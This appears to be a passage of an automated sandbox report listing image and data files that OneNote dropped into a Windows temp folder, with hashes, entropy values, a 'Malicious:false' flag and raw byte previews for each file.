                                                                                                                                            Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{B2083647-03D4-4971-8656-299AFE6DB387}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14177
                                                                                                                                            Entropy (8bit):5.705782002886174
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:EbgGcV/hlvpfal7rgYa8S7auAxwfuSTmCSNoFQ6NO7L:EbgGcVnpwimnd38FdQL
                                                                                                                                            MD5:7CDCE7EEBF795998DA6CAC11D363291C
                                                                                                                                            SHA1:183B4CC25B50A80D3EC7CCE4BF445BCFBAA6F224
                                                                                                                                            SHA-256:DE35AF949D4F83E97EE22F817AFE2531CC4B59FF9EE6026DCA7ECEBC5CF2737F
                                                                                                                                            SHA-512:560FB15A9C12758D11BB40B742A6EAD755F15AD10D6C5DEBA67F7BC8A2AE67C860831914CBCBCDED9E6B2D1D5F26A636B9BCEF178151F70B4D027316F94F27E1
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!.1..A....Qa".q..2.....&...B%6.'..R#3.$E.r457bS.DUFV.Wg(.......................1...3.Q..2Rr....s.4.!Aq.S.aC5B$%............?...n.Liq.}.{#....3/gg.1.M +..~3...q..+=..:.g.i1;P)7.....q..n.s"p...wx........v.t.f;..L/..~....y.r[.r.....n.n3..6i..g..}../........3..x.L.i?We..l.......~..<.;..6..o.....N.t.o6.l..~.......<...m.V...Q.7k.u./wq.t..;.I...}..{...>.L..3m..a....yd......6~.f..~Y..}+..<.[w..'-..?.v.7...v.u..4.......1];..u.MO.......s..p..ms.'.O-o...O......m.k.e....)t....i>..E|....,iOyD|.{......g.n...cu....=..........h.\.Q:?g/?.I.3._...t...d.n.0.%y....S.Q....S.&K.w..&wY<....%.g.v.....$y..#,i;.=...t...I6..yO..o.d..w\k...~......)..rK.......].u....N....e.s..kU.u..'}

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{B21FD5B2-601D-4DC9-AF29-0FFF70044E11}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):239
                                                                                                                                            Entropy (8bit):6.541057503179854
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:6v/lhPKLMRFj+8y6aoBRQcXgTxmRZnh80Ij3Xcnup:6v/7iQE6fwTsOWc
                                                                                                                                            MD5:088833D5A4FDCD105A34657922326F76
                                                                                                                                            SHA1:2A85EAA5121E27D6AA8F9D0C9D4C50620126D04A
                                                                                                                                            SHA-256:F3148B2CF70D225A76261E270E734F55D484D9ECF00B2DBD052D52FE40BD636C
                                                                                                                                            SHA-512:B988C05CB0192EF03603D002AEAA790016768039ED3177932E5CB2BBAD988E6EBD83B2DB9D4A2F0761FDFFA49EE28C8DD4494CEA77DFAC1BFB58DC1DADFDEF91
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR... ... .....szz.....sRGB.........pHYs..........o.d....IDATXG.Q.. ..m's7.h.d.....C..1.. ........H..s..@.t....... ....E...@..n......)*D.z.}..v..P]..J._.:Q.Ft..........,.E...."P..@.X.'..`f.....e3/..]'$..qK7.....IEND.B`.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{B2213FE7-BEF8-45A0-B1D0-BA814E938CEF}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1604
                                                                                                                                            Entropy (8bit):7.814570704154439
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                            MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                            SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                            SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                            SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{B2B88165-F4CC-46E7-B315-32022515DC33}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4847
                                                                                                                                            Entropy (8bit):7.950192613458318
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                            MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                            SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                            SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                            SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{B57ADA0B-3CB8-4A5A-AB32-349A42C09E44}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1657
                                                                                                                                            Entropy (8bit):7.80882577056055
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                            MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                            SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                            SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                            SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{B59824F5-DA08-4C38-9AE6-823C28C7FEEB}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4190
                                                                                                                                            Entropy (8bit):7.94161730428269
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                            MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                            SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                            SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                            SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{B5BB4D29-2A4F-4A3A-A444-11F9026E6C68}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4181
                                                                                                                                            Entropy (8bit):7.950380155401321
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                            MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                            SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                            SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                            SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{B6AD9BBC-1055-4818-8096-DEF0A29EC501}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4181
                                                                                                                                            Entropy (8bit):7.950380155401321
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                            MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                            SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                            SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                            SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{B79CF295-6C46-4FB6-8868-72E0A1BC9C2D}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 177 x 123, 8-bit/color RGBA, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):65589
                                                                                                                                            Entropy (8bit):7.960181939300061
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:2Hlrjw3xL//DPgff+9j6yPWvHMHjkbfnwHO3AW3GL:2H2zDUU+yPVHITwNfL
                                                                                                                                            MD5:8B48DA9F89264D14B83FF9969F869577
                                                                                                                                            SHA1:E1BD58E2D80FEEF56DC514F3F0B3AB9669F22F95
                                                                                                                                            SHA-256:62AD3C277E54F03F1ADB44062407346F789E63859B7AFABFD64BE6AF5E9F66EC
                                                                                                                                            SHA-512:03B783EC968DF3F648504D068D64DD1AE110E28110FE5B3401C9D04F44897DBE0CBB5680D42CA4C665FA94A6CED4B559106EB3C06C9BF2C5B14951ECBFFAC8AE
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......{.....;Za.....sBIT....|.d.....pHYs...........~.....tEXtSoftware.Macromedia Fireworks 8.h.x....tEXtCreation Time.05/15/06.8.p....prVWx..Y=.+I....t.y...,^vv....;. "|. .i7.....$.2g..']pH@p..]b....H.H.......d'@ B...U.xm..3{3k?..5n.._}U...3......~..>...g.....f..t...t:...p>..Si..d:..k:.Lf..t6.K.i....d<...x.8\.8.+lc...)i.$.r.....x.t.BG.R.cm.c...p.:&.6.4..K.......^...~b].0....oBYv..u.'.=.K.Q.g)6.....4.!.M......4.=....G.%.Sr........nxC.F..t.U........1...J.t..eQ....".... |...81.$D.!.>...........$...^.vY..EY8tb..'.P.g#O....S*..0'.V....x.W..........k.......s.C.S...J%.iVb..].........3....j.}*.z....+.s..@..K.....\x.C..e.Qq.....;N.....;....,....^.*..$F..{G...8.#....8'..&....8..5.....3(P._....S......|".....u.cr....+a-....&V..x...iI-<|a.{E.c.X.......?..&.C....'........(.x....>...M.?.9..#X......l...0...Z.F..<.z.0}Q..Z1..........?h..`E$K.2o.A*c^.......*..D..uL=.}.#*0.. M!.A.C......|_..(.Y........!E... .O...`;....M+..x.u~g...q>...N."D^..K..x..D.`.!.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{B8466AF0-BDD1-4804-AFA9-4FA3164E80E4}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4744
                                                                                                                                            Entropy (8bit):0.6517142274909743
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:RaNlYyfB3h1RRXUnfVYoroOHK5tGlDvtGlDRujlw//0lweI/CktGl5Rujd:RaNlYyf9/Uf3oOitatjWf/CktH
                                                                                                                                            MD5:29F0F0294EF9B0EB2AB473649FF7A7B9
                                                                                                                                            SHA1:8680BA980FBDC89DE1F7C1262BA4A3AECBBD30BC
                                                                                                                                            SHA-256:CD9C0F7BE3F8B16BD7B0F8C3E107F4419CE8071488A7946242577ED5CBE8CC14
                                                                                                                                            SHA-512:121E78BD847B6612D25D37FE480D7ADF11C05112E9C554D4EA9C0D737A2EF5A727DEC59EFC007C57A2C8EDDEECBC6177C37587F34E1CA7FC9F8D15F6A2A20697
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:./.C..vL....W"v_...~2..B....w/.!................?.....I...............................................................................................................h...........................................l.....F...Hn_@........>.2..zC.Fa5.S...............................7...7...7...7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{B8E30C06-19D1-4E2E-B460-EFF21F9DCEF2}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 40 x 650, 8-bit colormap, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):647
                                                                                                                                            Entropy (8bit):6.854433034679255
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:6v/71rwqZMXVs99W1YvpLp/Fvl+f43ocLtuplb+CrGotLRd:+wqWXVs99rpLpNvr3pIx3b
                                                                                                                                            MD5:DD876AA103BEC3AC83C769D768AD39FB
                                                                                                                                            SHA1:1833603AA9B6A7E53F9AD8A336F96CCE33088234
                                                                                                                                            SHA-256:1262DD23AD54E935CFA10FEB1BE56648E43BEF1116696CA71D87E6E033B1CA7D
                                                                                                                                            SHA-512:946DB2277213104A3B29EC4388578B05027B974A3093B4CCAD8847397AA51AE308BC6A199E5705E1F901D6E4B1BA34D8DECFD6E5B6685184A307D749D7CFAEDD
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...(.........xk....`PLTE.........................................................................................>.S.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.)..1..7w....6.*.H`T6.ha.k.............b!....Ba..C..P.4K..@.....h.E..X....PX+.P.-.....@@"...o.O4....xZ<...B...B..,A..y.s<......b!....Ba..C..0_p. .......=..,...i. ...=.j..N...........{4+...xZ<...B....|.....$.K<.vyE..X....PX+.P.-.:... .'p......\,...i. ...=.j........K.....%J..S+.....q..k.H.@DD.s...:..J.K.DDL.\.@`,.DD.:.(]..N....KD....A M.....F..S+.....1.sq........\.t..;..../...~k...4.DD.:..]..N....KD........@DD.s...:..J.K..[...Q....V......IEND.B`.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{BA6EFEC5-6F18-4E9C-BE6A-BCC8C64C6A37}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:10:32], progressive, precision 8, 594x773, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):242903
                                                                                                                                            Entropy (8bit):7.944495275553473
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:YVxOYlZX2kCWfYoFMXC/sBFC9r+4iEGM4rrcPoWmwkU6FJ:+OwZ2kbFMC/L99ifvokU6/
                                                                                                                                            MD5:C594A4AA7234EF91E6C2714CFE1410F1
                                                                                                                                            SHA1:C0F720D4CE3196852814D0B7347F0CAA0C6FD526
                                                                                                                                            SHA-256:10C833E47BE1C8496F949A6B059C2D79212A4DD66BDE62116EA337FA4FE0B654
                                                                                                                                            SHA-512:7313F6545A334F9E2DE5430B2DB5C419C4C8A40E075338DAFCD74970BCC6309786946E5DFB57531612BF4C6269495655706D920FD99922FDACFF9796710DA9C0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:10:32.............................R.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................{.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...v&.F;-v;}FH..Z...N..)Y.......h;C....G.0W..ww...MI..Z+..\.........c..4.1.~.Yo.Y6.&. q...............l.A#.~s?yYg..7ky...r

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{BAF4CBE3-5FE3-4C19-B986-A54741060963}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):25622
                                                                                                                                            Entropy (8bit):7.058784902089801
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:EhK81gTCyJ/Gf9Aw3t8w8EtdPeGDh6bEi1Ie1u4ZbvgwTwrSRh7ZKNpIGY:IjcRXwdJvtdGsUbEi1IeY8vgwTyC1+Y
                                                                                                                                            MD5:F8CCFC24DEB1D991EBE085E1B2D7D9BF
                                                                                                                                            SHA1:AF76C22A765434AEDA134924C517C84107F4FED5
                                                                                                                                            SHA-256:7354001527AB554C44E7D6981B86DD933B7DC2E0D3DC8512AD3EECD843245C52
                                                                                                                                            SHA-512:818BC3690B01B30BC571E4CF45EC8D1AFCAECBAB003532644381F1CF730A5B3486862D08F7579B2D3D89167AD7DF35028881245C9550B0DA23D1F81A720A9704
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!...1A.Qaq.........."2Rr.#.t6..B..3S$4..v.b..Cs.%5..8..cUV.(.DEe.&Ff...T.d.......................!.1A..Qaq...s4....2r..S"BR.3....b#C$.....c............?..D.."}:......&&...?3..W.q*.......]...m.Y.k1......K).J...uV.b.../.0.E.H..4..W_T.[t.V.w.9.x.qe.L..o.oL.....d.\.....6.|.o...}..H{Yn..E...6Y3.l.e..D.:,.n.%...t...m.........,+,..|..n.....6.*...f........6.../$../Vi..H...e.f.F.zn.).n.E..2sTn.i...Yb?6+H&...Bf..*....z.o.^7[..u.:o....t.s=.....(.s.....f.g....q9o.u1L.N...smzE..[>...+\O....j.<....j.c.W.............U..+.F/.'..W...T./W...>i01./....j.s."..Q...{...a._~OW...Rp.)*.e..W..Q4)<..'..W...q...'..U..z..g......U}...O....w....0F:.N..V.3W.|..'z0.]...j..U[v..g$D.Lc[.e...UW.m0+

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{BCB45D49-30BF-4FB6-809B-A8967357F032}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1604
                                                                                                                                            Entropy (8bit):7.814570704154439
                                                                                                                                            Encrypted:false
